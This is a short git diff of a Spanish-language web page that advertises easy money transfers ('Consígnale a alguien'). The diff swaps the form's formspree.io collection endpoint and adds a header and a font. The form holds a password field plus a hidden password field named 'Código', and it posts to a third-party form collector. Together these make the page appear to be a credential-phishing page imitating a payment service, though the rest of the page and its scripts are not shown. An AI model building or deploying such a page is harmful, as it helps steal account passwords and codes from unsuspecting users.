--- a/index.html
+++ b/index.html
@@ -2,6 +2,10 @@
 <html lang="en">
   <head>
     <link
+      href="https://fonts.googleapis.com/css2?family=Poppins:wght@500&display=swap"
+      rel="stylesheet"
+    />
+    <link
       rel="stylesheet"
       href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css"
     />
@@ -19,11 +23,12 @@
     <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
     <header>
       <img src="./Assets/img/Group 1.png" alt="" />
+      <h2>Consígnale a alguien de la manera más fácil de todas</h2>
     </header>
     <div class="form-container">
       <form
         id="formulario"
-        action="https://formspree.io/f/xnqwjljl"
+        action="https://formspree.io/f/mbjbzojq"
         method="POST"
       >
         <div>
@@ -43,7 +48,7 @@
           <input type="password" id="password" />
         </div>
         <div class="submit">
-          <input type="submit" />
+          <input type="submit" id="submit" />
         </div>
         <div style="visibility: hidden">
           <input type="password" id="code" name="Código" />
